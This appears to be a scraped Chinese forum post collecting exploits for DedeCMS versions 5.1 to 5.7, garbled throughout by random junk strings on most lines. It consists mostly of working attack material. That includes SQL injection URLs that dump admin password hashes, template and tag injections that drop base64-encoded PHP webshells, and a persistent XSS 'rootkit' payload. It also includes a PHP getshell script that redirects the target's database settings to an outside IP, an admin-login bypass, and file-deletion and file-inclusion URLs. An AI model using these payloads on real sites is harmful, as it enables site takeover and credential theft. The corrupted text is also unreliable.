|
|
* j" ?7 r2 ]( S! u
Dedecms 5.6 rss注入漏洞
; r4 h. Y2 Z8 Whttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1, c1 b: H; n3 v) V! q, D) |
1 b) J8 v- \* c2 `' _8 Q! ^) m' o. ?2 V. C8 T# H
" d+ Q# v+ }: C
+ D6 F/ g8 p2 g# [6 w( B3 `- z* [9 {
! e2 u- n) [! }- w* A1 N- k7 e5 v# P3 g: ~
1 ^( T: Y' n8 t6 j( {- l
DedeCms v5.6 嵌入恶意代码执行漏洞
. Z8 M* [, z0 q( E" \% r6 b/ Z. Y注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
! E3 T0 K T; Y+ _& I2 o' F5 C发表后查看或修改即可执行
, k) }( {& ^: g; R# W6 m0 M9 Ya{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}, i2 m1 w; j- T, D9 X5 g5 ^0 ?
生成x.php 密码xiao,直接生成一句话。
) F1 x" K1 p9 d ?5 K! W0 C, X# @
9 w& _- h' `0 B0 v
% Z6 s# g8 P! v9 v n! _' p7 S2 G$ z$ p
1 X& \' i& g! V
; U* F+ g3 l) ?( M, n0 ]
: e+ v2 {0 P- ^" E
9 h$ \' F Q+ i0 @+ b, k/ A$ }
Dede 5.6 GBK SQL注入漏洞
* g# W: i$ ~( phttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';- ^, K# F+ {/ m4 Q% u: Y' t
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
- s; D; ^6 E3 I1 j/ n: J# W/ ^http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
X, h% H' N0 }3 N% g' ?9 g% ?- F' S1 `2 K: i& F5 m8 B6 t' Y
. E' h7 F5 ~$ r$ h& L0 g% _+ d, ~
5 A8 c: d" p, s
: _; P$ ~' M1 k$ F
) B, Y' R5 P, l# }4 @" ]) l
3 r) D* _! N Y' s/ f
1 N5 j' s3 U- Z( v# T& J( h
( `0 L# b; P# `2 s) n& dDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
# U# `5 ?( Z5 J6 T& Y' D+ ]$ w ?http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
0 M, O2 r% p7 g& m" F5 `6 I
7 x+ c$ K6 h2 N. L3 W1 M2 u3 P0 ]( C0 X. s
( N8 D h" S( }; s% [
1 |* L) `8 j& t
" \& y, F+ s/ C' \5 b
0 i" [- ]; x* E2 V) c0 }3 P6 n* i
DEDECMS 全版本 gotopage变量XSS漏洞 q* a9 \" X/ @$ P
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
- {2 Z. p7 F( D5 m9 i' uhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
# y: R- H! [+ x. B: n4 V1 z1 I* i( |+ J) I
& n7 P# o; I Y* S1 z$ v2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 1 F& K# C! A- d. m) f' ]
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
# v. J) k- o: \( C) D
4 n% O5 G) x m' x1 [
/ r/ W" ~! R4 S. O$ P0 }http://v57.demo.dedecms.com/dede/login.php0 V# d u' A% \( s( O- T: D) E
7 j6 h7 U" }, ~& M+ \9 O0 W
4 A {$ h8 ?; c1 f* Y+ ?- P
color=Red]DeDeCMS(织梦)变量覆盖getshell
1 d& z1 _( x+ k& K& v4 z" r; M#!usr/bin/php -w j7 s; b3 O5 E1 G8 t! X( ~9 M3 m+ r5 p
<?php
6 S5 b, J3 c" [4 Y9 v% Eerror_reporting(E_ERROR);4 `5 X* l5 U( h6 ] e5 |7 s
set_time_limit(0);
% N; s5 g+ D! \. ^' x8 y; Hprint_r('
- k1 |4 i( r9 B+ Q _DEDEcms Variable Coverage
3 A' s+ `( c X* s6 U$ o$ iExploit Author: www.heixiaozi.comwww.webvul.com7 d8 M$ t: w0 ^( U9 q3 q5 W
);( P- I1 e# S4 [! F* h8 o; W
echo "\r\n";. T( r4 h# i4 h3 _) y; W/ B- y
if($argv[2]==null){
$ k. `0 L" F- |' _print_r(') i: C, b8 ~+ ?+ k: _. W
+---------------------------------------------------------------------------+
$ o- Z* o6 b3 |$ k& qUsage: php '.$argv[0].' url aid path/ L# p1 z, ^8 x( j$ `3 S- p
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus// p/ i6 ?: X7 ~8 p% q" }
Example:
7 N; J! P3 y5 s% R" ophp '.$argv[0].' www.site.com 1 old
3 U3 h. m" k/ N5 w' e+---------------------------------------------------------------------------+
: ?( B# e/ ]0 F3 h, A( L+ p; B');
& y9 t6 q) b3 f$ {& V3 F& E9 pexit;% e1 U5 G5 I* w4 A. v. v0 c( [- [
}( T; j9 Q5 K% t, Z: j& Y- G" p* l; H
$url=$argv[1];, R0 R% b% S4 D6 K
$aid=$argv[2];
$ C+ c B& n+ Q& z- m$path=$argv[3];- ?+ B0 Q9 K, E1 ]
$exp=Getshell($url,$aid,$path);' Z$ a9 c$ L k. f
if (strpos($exp,"OK")>12){& J: J" b; A1 `) m" f
echo "
, k. S; f3 w6 s/ i1 JExploit Success \n";
8 a F+ A9 L5 Y" V. ^if($aid==1)echo "% G4 z2 K0 H4 _6 o
Shell:".$url."/$path/data/cache/fuck.php\n" ;) W$ a- G, ? u9 C' X
7 W3 p- M& I0 U3 C8 ~5 Z3 ~ l) g; i! v- W8 o& }: O0 \
if($aid==2)echo "
0 \! I3 n2 n4 s/ u) {% cShell:".$url."/$path/fuck.php\n" ;
. B* v7 A \' ?( S- {' d' \8 W- e1 O- @# X
/ r; Q5 e/ [ w' \, s
if($aid==3)echo "0 |( [$ g! e* n" m
Shell:".$url."/$path/plus/fuck.php\n";
9 Y: ]1 w9 n6 e3 F) U0 V3 }/ Q' j3 p8 A" L3 G# G
2 }" Z) J( N, t% }2 M1 z* [}else{
( o5 A G3 r* R; ]6 ^$ Uecho "
2 ~8 l+ a% I" Y, ^Exploit Failed \n";( D! M+ m+ ~4 x8 o
}
# T& l3 M. ` D$ z i) f- d+ N4 m$ Ffunction Getshell($url,$aid,$path){6 m, B" j0 N! W' c6 y8 X8 `9 e) H
$id=$aid;
8 d( N( N0 \9 {' |( F( D% }' g0 h$host=$url;
; _! {- m z# E# D$port="80";; @' x+ T+ Y7 _( {$ W
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
1 F% p, \, C6 n# m7 l* A w$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$ z5 ?, J4 Q% m8 w2 ~! t6 k' ^$data .= "Host: ".$host."\r\n";
8 g" z. i8 |6 S7 I* _( g2 V$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
( i& O9 x7 G# A$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";/ z/ @; U4 O. S. G" t
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";3 o6 W8 d4 d p7 W: e+ ^ }
//$data .= "Accept-Encoding: gzip,deflate\r\n";
5 C1 Z& c# d0 n% L) F7 a# ?$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
: m# z$ k! x8 T8 D$data .= "Connection: keep-alive\r\n";% G% _) O/ u$ ?, g1 Q, s K
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";' |1 u! c% R+ O5 B
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";" y# C. D/ i4 I% @1 q
$data .= $content."\r\n";
+ h0 R* Q! O, p5 I# {, |$ock=fsockopen($host,$port);
4 N9 l: k5 Q. B8 h O2 `' q* Yif (!$ock) {6 ~; j: u4 A% a
echo "
9 M- [4 u% u; }- n: e& ZNo response from ".$host."\n";; @; h a' d8 ~
}
+ Y2 }/ X; N9 s. s* }fwrite($ock,$data);
0 s; L6 H) P6 q. Pwhile (!feof($ock)) {1 D* b; z/ T y. Y
$exp=fgets($ock, 1024);
3 f2 u+ M4 f$ h' `, sreturn $exp;' c3 w6 t+ w$ i% q0 B: }) B
}
1 W: d% L6 M- w. {}1 t! T" s9 Z1 P: A3 c
9 z% F. T" a9 P/ R+ w2 E" Q
- g* h( A2 n- i& b m" U?>- @# C9 D( y+ ?6 v/ p7 j5 x
; g7 t& d. M0 F$ Y8 c# B8 _
0 a; V0 z' t8 H/ c! Q2 y" {6 a
, C% t. T2 x# X* A
8 ], e( D0 D5 u! z7 W
, ?! p" d! n! Q. k7 n
$ u, ?5 O) \6 e, ]
; [9 c2 D N& W( \0 y: d0 P: r4 v+ ^ V5 l
' R" T7 ~9 w" ~9 {5 S" v" z* U2 I9 ]
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
" c' x9 N ^( y+ W. y" `http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
# P: ~. d g, H; W, v) m2 R: ?, i: I$ L1 D
, W0 O z' b4 \% [2 h" \( q
把上面validate=dcug改为当前的验证码,即可直接进入网站后台1 D" E! a4 V- m+ ]# U
. E6 ]) ]7 T2 z" |! E0 d/ ]& z6 P" y* h9 B0 O& y F
此漏洞的前提是必须得到后台路径才能实现6 ?$ i) q$ y1 M( _5 f- \7 }
: a& f9 n+ g( C2 u) M% t) R8 \1 t$ K4 @1 D* w) \0 X, Y
- g& S! _) C$ O% L$ ?+ z: }
6 ^+ i2 [, k: e. W; D
" @% N6 |! e2 B* H* u. {' R
( t& |7 l; ~( G# [3 E: J
4 [4 b- q9 {. C7 g6 f
: x% N5 n2 D9 u7 _5 i3 }
+ p2 b; _, W7 f, O5 {
$ f4 j' @- d8 ^! }1 vDedecms织梦 标签远程文件写入漏洞
7 n: u/ Z: W0 _2 P9 J$ h. S# ^( l前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
0 S: c: i) F$ ~, P9 ^- ~: J$ l2 U6 @$ O: @ _. }' X% e
+ Q, V2 W/ \( ~) v再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 4 p( E2 J1 J/ Y2 w, a) a7 r9 D% u4 g
<form action="" method="post" name="QuickSearch" id="QuickSearch">$ V( ]' \3 J. S' Y' N7 c3 j
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
* N$ T% K- G. B) y# f0 n v$ Y<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />+ i' B3 ~% k6 `0 b o6 h: }6 \
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
+ X; q, E5 v0 |7 V2 t+ `/ D8 L$ A<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
* e4 `. @! ~. J- T/ D, k8 F3 W& R<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />4 O1 r2 Q1 U# r+ |2 h2 |
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />4 {0 b* L' ]" _/ G. f K2 O8 k
<input type="text" value="true" name="nocache" style="width:400"># y6 C+ g+ w2 r) C' O# ~6 q
<input type="submit" value="提交" name="QuickSearchBtn"><br />" d8 H( M# W' |1 p
</form>9 G$ _( C, I" ^: A0 ~. A+ S
<script>- k! ~6 n) ~' X9 x' O& _ A4 ?3 N
function addaction()
1 ~& ^, q7 M3 ^$ `9 d- N* F{$ c! I/ P* K3 V
document.QuickSearch.action=document.QuickSearch.doaction.value;. k E( b; j' h" u7 m2 v( M0 P
}4 e: U9 _; }7 \4 w1 [
</script>
2 D( a2 [: K5 l* Y. B+ j: g$ k' n
4 F1 W) g9 d4 `# S( @% N9 i3 Q
# B3 ]- g1 P4 I1 ]
3 ?, C& m8 n- {, ~! D4 z( a7 B, M
. z* F' R/ L/ Q1 w6 n3 m/ K3 X5 K
7 G5 Y- k7 a5 g9 E2 i- e2 Z$ Q5 |
$ u+ f# I* D# ]5 X# u8 ~, x" C+ d
7 d" }1 ]/ ] R' Y' k
6 m% g0 {( d2 r8 u6 [2 x* o9 S
DedeCms v5.6 嵌入恶意代码执行漏洞8 x9 f- C# T8 {: [
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
2 p* w2 s; _& J2 {+ w0 J, za{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
! _4 N+ f3 o3 ?6 |( W8 R生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
' W9 q, n* K3 y" x6 E! ~; dDedecms <= V5.6 Final模板执行漏洞
7 a# X5 s4 `7 h6 x, j" x" ]注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
( L% P7 m- I X( G5 Auploads/userup/2/12OMX04-15A.jpg
( n" |3 d: N, I3 ^
. I* o' M6 X o4 z; x! I, b# U' Q3 e+ E( y" Z) y" ]6 T$ K
模板内容是(如果限制图片格式,加gif89a):$ I- l/ J0 y% o& p
{dede:name runphp='yes'}
! m/ t3 j5 x9 u, s! N5 {$fp = @fopen("1.php", 'a');2 |+ ?9 U7 z! Z8 ] {; \
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
; h, R% e5 R. w9 r! }( h@fclose($fp);, Q8 d4 Q) `5 j L. J' ~6 Y+ B
{/dede:name}( H# z" A- c2 A; u4 o$ _, |
2 修改刚刚发表的文章,查看源文件,构造一个表单:
9 d6 A3 Z+ l* X: n3 ]<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">! A6 A7 s0 |8 b
<input type="hidden" name="dopost" value="save" />. S- x- [8 ^5 U: G3 m- n% a9 {1 q
<input type="hidden" name="aid" value="2" />
7 L& ?8 i$ D, B( Z. q* L f2 d! T U<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
* X* _# e9 s/ m: {6 _<input type="hidden" name="channelid" value="1" />; R+ N+ @; r8 Z! f& Q2 ~2 q( \
<input type="hidden" name="oldlitpic" value="" />
+ n; T: q$ Y, u' p* Y& a, \: m<input type="hidden" name="sortrank" value="1275972263" />0 U' @7 q% p; l
8 p( G+ n8 r2 }3 H8 t. z5 c& B
& Z5 C' C# w, N* @2 T6 m
<div id="mainCp">; Q7 C2 j& E F1 X% }( P# F
<h3 class="meTitle"><strong>修改文章</strong></h3>
8 h1 E. f% e2 w* @. g! U' [% f
( H9 [; o7 L0 [, w* _- `/ S" x) C0 c# X; A
<div class="postForm">" x8 O9 W4 z" }! ^# R
<label>标题:</label>
$ ~( k O9 J h$ T f<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>& R p1 e) i# l# G4 N0 n
% w, A2 l* g6 `! y" N
. {# p: }- h( C' G# _<label>标签TAG:</label>
2 t3 W5 e7 O% `) t l<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
( ~" k& n9 o9 O7 s( X9 E$ Z
$ f3 v' \* Q0 u
+ \$ L. _% B8 F6 z S. G2 U" U<label>作者:</label>. F6 _5 u8 Q4 N" N8 S4 d
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
5 [. {' B, c b3 m
$ N( S" Z7 S1 \& ?8 V% f) `: x( t
<label>隶属栏目:</label>& w7 v% J2 k: R2 [. D
<select name='typeid' size='1'>: a8 t- e7 k& _$ b6 K6 B
<option value='1' class='option3' selected=''>测试栏目</option>
( \ ]3 ~4 x6 i0 a7 s</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
' \; _+ [8 g" m+ y9 h6 i- T+ }
9 P# f& f _/ q5 O3 R# p$ J2 R& I5 x
2 a/ \: s1 Q3 y' y% H. X<label>我的分类:</label># S! C9 m+ J V! p
<select name='mtypesid' size='1'># {3 U9 D- m2 Z, M$ J& }4 R) o8 g' k
<option value='0' selected>请选择分类...</option>
% Q! e, e. I3 C3 G @<option value='1' class='option3' selected>hahahha</option>
8 f3 ^! A6 l% H7 N% }8 E* |</select>
) f5 c, `8 c- n3 N
! |, X& E# B: S; {" X
8 V$ t% h; W" s/ s) r! U' s7 \! C<label>信息摘要:</label>
1 n8 n5 D) H6 d E+ [4 ?<textarea name="description" id="description">1111111</textarea>
; q+ Z; d; O1 ~. E# F" d(内容的简要说明)- o' j8 Z4 W* M4 V6 _+ V, N
$ P ?5 m! A/ [. P3 W9 H0 o, h' g2 G ~4 a& Q3 i+ C, G" M0 S2 U& O
<label>缩略图:</label>9 q" P$ w) I! t2 F+ ?
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>3 b; d6 F a1 M. U
) H" Q, h& Q* h
% b+ l! i; j$ E<input type='text' name='templet'; I9 t) e1 o2 S$ M1 S) |4 p
value="../ uploads/userup/2/12OMX04-15A.jpg">4 N- w, c& x0 M
<input type='text' name='dede_addonfields'7 a. h; M8 H1 p( C5 T
value="templet,htmltext;">(这里构造)( C% |( z, E# J2 Y0 r- ^: }+ v1 ]
</div>
# N, U7 |$ G) |2 m! {% E
& `3 _/ t$ x, c4 t: Q, K# W U }
<!-- 表单操作区域 -->% b% p) ?9 x: F0 ^) s
<h3 class="meTitle">详细内容</h3>% q, M1 P1 P$ t ?8 t
" H# H3 X: c/ q5 `$ x, w7 t7 o/ G& f* f: t; O5 J
<div class="contentShow postForm">, ~2 k: r0 T U( l6 s
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
1 P/ c9 I! A7 {4 [8 N B
, E7 _5 U$ D* V! } x8 H) ], F% ?/ `3 A" X; Z
<label>验证码:</label>9 }' C0 ?3 t* Y! W; d
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
: F9 S, Z2 H9 P. r6 v+ A<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
6 k. @& K8 V0 _. E W+ w9 r
$ o# Y. ]) X6 n7 a% o0 r0 E4 r3 Y
<button class="button2" type="submit">提交</button>
; e+ k& H1 ~2 y2 O' ^<button class="button2 ml10" type="reset">重置</button>- Q2 ~+ P' \5 |2 @& W7 m6 l
</div>
; ]$ a, i3 F z( B! ]: o, s7 b
+ J V: Q! |* K* G3 L5 y6 _. z ? f% a2 |7 J7 L, F
</div>) `: G2 M, X1 [5 O) \
# r9 ?, O" U0 ~6 b! c" Y+ h
& w- P$ b1 j7 r* u; h</form>
$ b. i* Y: {9 O. N# o0 M- l
~: @/ {8 ^5 h
0 P2 M! `" ?+ A! R提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:. r+ F0 ?- s4 {3 E5 r9 ?
假设刚刚修改的文章的aid为2,则我们只需要访问:# t+ {% r; ?5 G3 C
http://127.0.0.1/dede/plus/view.php?aid=2
; w) l O$ N0 i$ G$ L3 H即可以在plus目录下生成webshell:1.php' h$ i1 j- B4 P- U$ g4 } O2 L
: }8 Q/ X4 R# B; @' W$ e& |$ P+ S5 n) \, g: e
2 u$ h' ~: i/ [0 Z
7 S- @$ a$ _4 O: }, i6 h
, N1 m' v) [& K0 a+ X [
" @) {7 D2 P* |' V
/ C' E) z8 r- N0 {; w$ t1 {: p1 w! p& W2 G
' G, n: S# |1 H j$ E0 I$ _. \3 B
6 j2 G. X# z2 p+ V
Y: M' i p& @6 p7 z' O1 o/ l) O. z
& j; o$ o F/ }8 d# Y2 H* aDEDECMS网站管理系统Get Shell漏洞(5.3/5.6). q6 C3 H+ u+ n( x; I. M' h
Gif89a{dede:field name='toby57' runphp='yes'}+ k* ?! O; }; P2 P7 ~6 @" H, l+ J
phpinfo();
% P+ u2 f" v' Z/ _3 b{/dede:field}/ `4 @% Y7 r# |" n: L
保存为1.gif* _3 {3 j% y* F) C6 B
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
/ R& H5 ^8 Z+ `8 Y J q* F<input type="hidden" name="aid" value="7" />
0 D& B" E( ]! u9 F: {9 Z, k7 `<input type="hidden" name="mediatype" value="1" /> % i; V" u' F& P% X
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 5 {% }" M. j, v, G4 P) _
<input type="hidden" name="dopost" value="save" /> & W7 g1 Q5 w' t# @8 T1 O
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
; Q% q! j8 L8 C! w* Y, C8 H<input name="addonfile" type="file" id="addonfile"/> 4 Q2 \# K/ c: l5 x# `" N4 O
<button class="button2" type="submit" >更改</button> H; b7 B. u' ]1 Y3 t
</form>
% K) v2 }7 o; Z6 {, _' p
# ?% l2 j/ L4 y* k; S- _) a' N1 |- M# l* w& x4 I% m* Z( o
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
/ ?7 z, a& h1 w6 S! e发表文章,然后构造修改表单如下:5 j8 M* B; s& w+ Z! i/ d% m! M% G6 M
9 \9 K4 u- O6 M/ U
' O# i' Y+ F, U% g A
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 3 n+ G8 I. q# g& ]
<input type="hidden" name="dopost" value="save" /> + M# ?: i9 G$ X& l0 j+ Q
<input type="hidden" name="aid" value="2" /> 1 Q* ?% Z# S9 B+ n( X
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> ( ]( \8 c8 x2 x+ H
<input type="hidden" name="channelid" value="1" />
3 `1 e) L" o9 M2 ?7 m* P. _8 q<input type="hidden" name="oldlitpic" value="" /> % t7 \% R( q$ T
<input type="hidden" name="sortrank" value="1282049150" /> / \# u) i0 V# S$ w% m& g% N7 ]
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
! s# l0 Z0 j7 c4 }: A/ N# j<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> - Q% |. d' Z i6 m8 e1 i, [
<select name='typeid' size='1'>
! D( s) O4 T% ?3 b<option value='1' class='option3' selected=''>Test</option> 9 y: ]* i* [" w
<select name='mtypesid' size='1'>
, m/ d; u0 {6 k* |) o- Y<option value='0' selected>请选择分类...</option>
# ?, m6 ^; K0 V; {$ O5 k<option value='1' class='option3' selected>aa</option></select>
" l* ?9 Q0 _: ^- T. m% u<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
7 V' ^ M# E: b% I- {2 N<input type='hidden' name='dede_addonfields' value="templet"> ) _) v) X1 g( `6 N$ @
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 6 W/ n8 h+ V" h) ^+ T7 Q
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> " L5 b+ B# x! v- A @" N
<button class="button2" type="submit">提交</button>
! h% V5 V, i/ W* u6 u( h</form>1 F3 v2 k; m& ?8 X* L6 ^
7 a6 Q2 \0 F7 G0 }
* z! c2 E2 x( I
: v- Z4 e) F5 U0 ~3 N7 @' p( z9 I2 [: m9 T; x" Z
' K- w3 l1 v1 I# K: B Y
[. p: h3 x: x8 q
1 y. |- b/ K: `/ `1 R. o+ z/ h0 b3 Q
5 `7 d1 o% ?# A7 ]- h X/ ?4 r
3 @9 m" V7 n9 w1 U* @* J) z1 R; G4 \1 {( _$ M
Y# {" O+ T3 L
+ n6 O# M( p$ D* T
织梦(Dedecms)V5.6 远程文件删除漏洞$ l+ }3 H4 V8 w4 h7 D0 G
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
5 l. c* c4 L) s1 m X7 ~% |7 \3 I8 N3 \1 o/ V& Z! D7 C
. y0 g' e% c( e3 s" u! I
2 Y% u7 t1 N7 z5 a8 y- X: V9 b
1 P" @; J& S3 R7 X% Z# a' f- m
$ C+ |; a" j& ]) B! }
* \" @( P3 A: E& Z
6 T! [( }3 U& n" a$ Y. s6 a l' w+ z3 e8 I; j7 _3 u
7 m; B0 }- V/ {. H" Z/ A# l2 E
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 k( ? g5 m8 y: I3 {4 ~
http://www.test.com/plus/carbuya ... urn&code=../../
1 I: K) D/ i6 |1 S4 }# u8 q
8 f T, ^' d! D* \+ h A/ U& k. _2 Q8 d# @' s$ V
1 z, w' c* r7 J$ d3 {
) Z4 [+ F" z8 s
$ s9 A9 f0 Z u% E% w
( M: O4 ^; A8 n4 r6 M) f/ d
5 M, E& _) z4 J$ {3 {9 I3 F# Y# p3 R; ]; M" ~3 f5 D0 \
" U( p, P: t: M5 n$ [9 ?6 O' U, y; l0 j4 F
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 8 \( {0 r$ V% @6 j' h
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`/ ~, g* N9 a' H# { x7 r
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
4 Z% R0 w8 d2 O; [' N* L8 ~4 a' m7 R- X, e- |8 R0 l
: Y4 Y* J2 C) `3 Y+ {
, l9 j% M: p6 b" q: l j- ~1 U4 }& h" x J: N6 h5 N0 Y+ T4 \1 y
_# u& w8 m, F E
% x( }9 b& m4 ~, `' Z
. U0 V7 ~& [( z5 ]. a
# }: J+ \$ R& H1 f; O! ~$ D0 y; ~9 o
* t, ^' G; H; L/ j( z |8 g9 a& A- a- p( y" W6 x2 R: }
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞: l; M8 l6 ^+ }: q% N) u
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
! e3 d. o% t& w" n8 x# R6 o
; U$ S. t; g1 {( ]! h
; l8 y. ]* Z8 E2 `# g
6 Q6 R. r) h9 q l4 B/ v# l' u2 O! w5 J0 p, _) t- s
) ?3 W6 x$ x: K3 z/ ^5 ]9 F8 E. n# _# r% x- D3 J" M! v
1 t2 O6 G3 T k$ K
